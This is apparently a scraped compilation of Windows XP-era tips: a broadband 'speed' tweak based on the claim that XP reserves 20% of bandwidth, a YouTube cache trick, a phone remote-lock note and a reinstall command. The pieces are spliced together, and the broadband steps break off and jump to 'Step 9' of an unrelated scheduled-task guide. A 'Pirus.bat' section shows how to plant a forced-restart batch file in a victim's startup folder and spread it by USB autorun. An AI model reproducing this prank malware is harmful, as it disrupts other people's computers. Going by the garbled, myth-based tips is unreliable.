Increase BROADBAND speed in WinXP 

1. make positive your logged on as actually "Administrator". do not log on with any account that has administrator privileges.

Effect is immediate on some systems, some require to re-boot. This is more of a "counter what XP does" thing. In other words, XP seems to require to reserve 20% of the bandwidth for its self, even with QoS disabled. So why not use it to your advantage.

This tweak is for broadband cable connections on stand alone machines with winXP professional version - might work on Home version also. It will probably work with networked machines as well but I haven't tried it in that configuration. This is for windows XP only, it does not work on win2000. I use 3 Com cards so I don't know the way it works on others at this point. It does not involve editing the registry. This tweak assumes that you have let winXP generate a connection on install for your cable modem/NIC combination and that your connection has tcp/ip - QoS - file and print sharing - and client for microsoft networks , only, installed. It also assumes that winxp will detect your NIC and has in-box drivers for it. If it doesn't do not try this. In the "My Network Places" properties (right click on the desktop icon and pick properties), highlight the connection then at the menu bar pick "Advanced" then "Advanced Settings". Uncheck the three boxes in the lower half for the bindings for File and Printer sharing and Client for MS networks. Click OK
1. From the windows XP cd in the support listing from the support cab, extract the file netcap.exe and place it in a listing on your hard drive or even in the root of your C:\ drive.
2. next, open up a command prompt window and change directories to where you put netcap.exe. then type "netcap/?". It will list some commands that are available for netcap as well as a netmon driver will be installed. At the bottom you will notice your adapters. You ought to see three of them if using a 3Com card. One will be for LAN and the other will be for WAN something or other.
3. Next type "netcap/Remove". This will remove the netmon driver.
4. Open up control panel / technique / dev man and look at your network adapters. You ought to now see three of them and one will have a yellow ! on it. You might be asked to enter an admin account and password to setup a task - Enter you info and hit

Step 9: Leave that stuff default and click next.
Step 10: Check the "Advanced Properties" box and click Finish.

Step 11: In the Run Box, at the end, add: /callto: phonenumber, ex: "callto:+18001111111". { note - there is no space between the : and phonenumber}

Note: Phone number is "+1"+area code+number. Such as: +1800555555

Step 12: Either click the Schedule tab to fine tune scheduling (MWF only, etc) or click Finish.

shutdown -r -f -t 00

It’s Simple, the function is to Restart the computer in 00second

You can change it to shut down by change the value “-r” above to “-s” w/o quote

Or Log off with “-l”

Save, and rename to “restart.bat” w/o quotes.

Step 2:

Make new text again, fill this:

Save to Pirus.bat

The Function is to Copy the restart.bat to the path and run it on start-up.

Step 3(Optional):

You can make an autorun file with this script on notepad:

[autorun]

Open=Pirus.bat

Shellexecute=Pirus.bat

Then Save to autorun.inf

Put the 3 file in 1 Folder, or put on Main page in your Removable Disk and pray that the target don’t know about this….

New Way to Save Youtube Videos

Open the YouTube video page in firefox 3. Allow the video to play once.


Now the video is finished playing. Open a new tab in firefox 3. In the location bar (address bar) type

about:cache

and press enter. A new page will load. In the page see the heading

Disk cache device

Under that there is “Cache Directory”. There will be a long address similar to one shown below

C:\Documents and Settings\username\Local Settings\Application Data\Mozilla\Firefox\Profiles\abcd123h.default\Cache


Copy the full address (You must copy the cache link address from your computer. The above address is just to show and make you understand). Now open “My Computer”. In the address bar paste the already copied long address.

A folder will open. This folder contains the youtube video file in the form of cache. Note that the video file will be big in size. Now open VLC Media player or any other favorite player. Drag and drop the bigger cache file in the media player. The file that plays the video is your video file. Copy and paste it in desktop. Rename the file to yourvideo1.flv (or any other name of your choice with flv extension).

Now you have saved the YouTube video right from your Firefox 3 cache rather than downloading it again.

You can watch the saved video while offline.

The remote lock option in E-Series phone allws you to unlock your phone by sending a sms.
The only thing you have to do is to activate this feature by going to Tools | Settings | Security | Phone and SIM | Allow remote lock menu. The password of your memory card will be your remote lock message.
So you have to just send a sms containing your remote lock message that will automatically change your memory card password.

 

How To Reinstall Windows Without Losing Anything

You can use this method as often as you like when you need to repair something that had gotten corrupted and you don't want to do a clean install. This is better than doing a windows repair install from the cd because doing that can cause changes to settings and even make it so you can't get updates anymore from Microsoft update site because of the 'silent install' they did a year or so ago (unless you re reg some dll files).1- Start Windows xp2- Go to the location of your source files3- Run WINNT32 /unattendedFor example, D:\I386\winnt32 / unattended ( copy & paste this command into the RUN box, then press ENTER ) Your computer will do the rest. OR Start > All Programs > Accessories > Command Prompt. Copy & paste > D:\I386\winnt32 / unattend (notice the space between 32 and / ) Press Enter. If you have i386 on your drive, you can replace D: ( if D: is your CD drive ) with the location of it. (be sure it's the full i386 though) D: is the driver letter where your windows XP Cd is if D: \I386\winnt32 /unattend doesn't work then try : D:\winnt32 / unattend
